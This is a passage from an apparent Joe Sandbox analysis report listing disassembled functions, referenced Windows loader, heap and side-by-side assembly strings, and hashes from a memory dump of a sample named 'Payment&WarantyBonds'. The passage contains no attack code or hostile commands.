                                                                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01872409
                                                                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01872412
                                                                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01872624
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                                                                • Opcode ID: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                                                                                • Instruction ID: 1fcff6de5e3dc45206aea32cd901f1b5a19f023bf95e1bdd9f590786cd41b9fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                                                                                • Instruction Fuzzy Hash: B5025EF1D002299BDB31DB58CC80B9AB7B9AF54314F0441EAA709E7241EB709F85CF99
                                                                                                                                                                                Function 018A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                • Opcode ID: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                                                                                • Instruction ID: 39e838fb673d6d672de22f6b4c706f95462bfa113cfb183e21c77aaef7ec4efc
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                                                                                • Instruction Fuzzy Hash: 5351D4715043199BE329DF188844BABBBE8FF95345F94492DEA98C3241E770D704CBE2
                                                                                                                                                                                Function 018B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                                                                • Opcode ID: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                                                                                • Instruction ID: 859cb674908ac2eef1143725e93dc3c5a07eec04c7b365b4ae0a32049fd2cf57
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 18D1973150068ADFDB26DF68C494AAAFBB1FF4A714F18805DE545DB752C734AA81CB10
                                                                                                                                                                                Function 018889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01888A67
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01888A3D
                                                                                                                                                                                • VerifierDebug, xrefs: 01888CA5
                                                                                                                                                                                • HandleTraces, xrefs: 01888C8F
                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01888B8F
                                                                                                                                                                                • VerifierDlls, xrefs: 01888CBD
                                                                                                                                                                                • VerifierFlags, xrefs: 01888C50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                                                                • Opcode ID: 52baa7fbf636d9f1e571b2e1a22acdc8ee63a85da69bd3dc034b89ff6fd6a329
                                                                                                                                                                                • Instruction ID: 86d167db8fb8a742154ef48f61797d69bf41cca6811139c61f135857116ca555
                                                                                                                                                                                • Opcode Fuzzy Hash: 52baa7fbf636d9f1e571b2e1a22acdc8ee63a85da69bd3dc034b89ff6fd6a329
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C912571A41716AFD721FF2C8880F2ABBE5AB95B14F84051CFA45EB285D7309F05CB92
                                                                                                                                                                                Function 0180EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                                                                • Opcode ID: 32f246818066da27cee826ba8e307de05f091c164f34eea90c284c00c3bb4561
                                                                                                                                                                                • Instruction ID: c07c390a3c6dfbf29324c0bca05efaa3398fec3e888a216040f036157caa9eaf
                                                                                                                                                                                • Opcode Fuzzy Hash: 32f246818066da27cee826ba8e307de05f091c164f34eea90c284c00c3bb4561
                                                                                                                                                                                • Instruction Fuzzy Hash: 30A21874A0562E8BDBA5DF18CD887AEBBB5AF45304F1482D9D909E7291DB319F81CF00
                                                                                                                                                                                Function 018363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                • Opcode ID: 997da582d42541fd5fe7daefee38791df5e6c21fa84a46ffae9a9d1c26542179
                                                                                                                                                                                • Instruction ID: 22d797bdd79ad271d2752c5e256f1535f2b1e9727251a7407f52030bd7f64da2
                                                                                                                                                                                • Opcode Fuzzy Hash: 997da582d42541fd5fe7daefee38791df5e6c21fa84a46ffae9a9d1c26542179
                                                                                                                                                                                • Instruction Fuzzy Hash: 33910A70F01715ABDB25EF5CE884BA97BA5BB51B14F28012CEA10E7281EB74DB41CBD1
                                                                                                                                                                                Function 017F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01859A01
                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018599ED
                                                                                                                                                                                • apphelp.dll, xrefs: 017F6496
                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01859A2A
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01859A11, 01859A3A
                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 018599F4, 01859A07, 01859A30
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-204845295
                                                                                                                                                                                • Opcode ID: 3a26ec920a85d67e0edab3fa2f58c758e4bd28a4188def1d11949dd71d168511
                                                                                                                                                                                • Instruction ID: 45abd722557eac7fb01146992cf59eea35ddbec73e6a168bd292d6d2ef480730
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a26ec920a85d67e0edab3fa2f58c758e4bd28a4188def1d11949dd71d168511
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E519071608305DFE721DB28C855F6BB7E8EB84748F10092DFA85D7265E730EA04CBA2
                                                                                                                                                                                Function 0183C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01878170
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0183C6C3
                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01878181, 018781F5
                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018781E5
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 0183C6C4
                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01878177, 018781EB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                • API String ID: 0-475462383
                                                                                                                                                                                • Opcode ID: ab7bdef67fcc2446a21b40c06621977c543f94fe63384422df6d185b123eb3a7
                                                                                                                                                                                • Instruction ID: eac7775799f442356901d87fcd6e340a5ed83366a1140dbbe6d523d3a1e04860
                                                                                                                                                                                • Opcode Fuzzy Hash: ab7bdef67fcc2446a21b40c06621977c543f94fe63384422df6d185b123eb3a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 0931E4B16487469BC224EB2CD949E1AB7E5EF94B14F04056CF941EB291EB60EE04C7A3
                                                                                                                                                                                Function 01832674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0187219F
                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01872160, 0187219A, 018721BA
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01872165
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018721BF
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01872178
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01872180
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                • Opcode ID: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
                                                                                                                                                                                • Instruction ID: 0c5558b9b4a636f655bbaec76e29c9edd269b3d80c883b280f07c69135124833
                                                                                                                                                                                • Opcode Fuzzy Hash: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
                                                                                                                                                                                • Instruction Fuzzy Hash: 21313776B4021577EB229A999C55F5BBBBAFBA4B94F094059BB04E7200D270EF00C3E1
                                                                                                                                                                                Function 0184096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 01842DF0: LdrInitializeThunk.NTDLL ref: 01842DFA
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BA3
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BB6
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D60
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D74
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                                                                • Opcode ID: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                                                                                • Instruction ID: 324b1e80f3a4aff40e999eb9bd6048cff68b38e902d3430c91963f6fdbba510a
                                                                                                                                                                                • Opcode Fuzzy Hash: 32800993097451122569fffc98408aec1d88b75f5c3d6f37f5c097b8e5a27930
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D423A75900719DFDB21CF68C880BAAB7F5BF44314F1445A9EA89DB241EB70EA84CF61
                                                                                                                                                                                Function 0180A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                • Opcode ID: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                                                                                • Instruction ID: 5ee3b52cc20dc71e0a37f40072e8bfdf7517a10f0d65fc695995a219a736b8c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 428501119cf1d70973560884d8f8d763e10ca204a32ec4b0b5aa84a96d6f21be
                                                                                                                                                                                • Instruction Fuzzy Hash: 52C19C7410878ACFD75ACF68C880B6AB7E4BF84708F044969F995CB291E735CB49CB52
                                                                                                                                                                                Function 01838402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183855E
                                                                                                                                                                                • @, xrefs: 01838591
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01838421
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 01838422
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                • Opcode ID: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                                                                                • Instruction ID: d00a205faeb3bc943d26b056b88c0bd29ffa811ea2a978f10d0091199867be40
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a469859718a973caf6af826bb3c017fe29480d6a2f9c8ba78df7a78f59b8693
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E919D71548749AFD722DF25CC80E6BBAE8BB85744F440A2EFA84D2151E734DB448BA3
                                                                                                                                                                                Function 0183273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018722B6
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 018721DE
                                                                                                                                                                                • .Local, xrefs: 018328D8
                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018721D9, 018722B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                • Opcode ID: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                                                                                • Instruction ID: 89a6864344931651f7c1d94e75dfee5177d8d8f37e1ce78b57eba22db1914d0d
                                                                                                                                                                                • Opcode Fuzzy Hash: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                                                                                • Instruction Fuzzy Hash: 3FA19D359012299BDB25CF68D884BA9B7B6BF98314F1841E9D908EB251D730DF81CFD1
                                                                                                                                                                                Function 01834AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01873425, 01873432, 01873451
                                                                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0187342A
                                                                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01873456
                                                                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01873437
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                • API String ID: 0-1245972979
                                                                                                                                                                                • Opcode ID: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                                                                                • Instruction ID: 99de1c422a06b1d805dc27b9a31e3eaf3aaf90ce5c94d5a65e17ef0a51302184
                                                                                                                                                                                • Opcode Fuzzy Hash: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                                                                                • Instruction Fuzzy Hash: 556122366007069BD72ACF1DC881B2AB7E5FFA4B24F188519EC55DB241CB30EA01CBD2
                                                                                                                                                                                Function 018064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018610AE
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0186106B
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860FE5
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01861028
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                • Opcode ID: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                                                                                • Instruction ID: 5372cd93f26b4e3b2f11181f7e43f82513d73ae687e59cd5d263fcca0ee6035a
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D71CEB19043499FCB62DF18C884F977BA8AF95764F500468F948CB287E735D688CB92
                                                                                                                                                                                Function 0182245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0186A998
                                                                                                                                                                                • apphelp.dll, xrefs: 01822462
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0186A9A2
                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A992
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                • Opcode ID: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                                                                                • Instruction ID: 0bb94acd54f12448b67b6659d80231dd601991f887e81d36cae1b3c5dd9167f0
                                                                                                                                                                                • Opcode Fuzzy Hash: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                                                                                • Instruction Fuzzy Hash: 53315971A00201ABDB369F5DD885E6AB7BAFB84B04F25001EF911F7245D7709B81CF80
                                                                                                                                                                                Function 018129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0181327D
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 01813255
                                                                                                                                                                                • HEAP: , xrefs: 01813264
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                • API String ID: 0-617086771
                                                                                                                                                                                • Opcode ID: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                                                                                • Instruction ID: 255149989574b59d6627537baed293a13a59a5bd73ae7efebf40e210ca6abd83
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1292BC72A042499FDB25CF68C440BAEBBF6FF48314F188459E849EB35AD734AA45CF50
                                                                                                                                                                                Function 01810770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
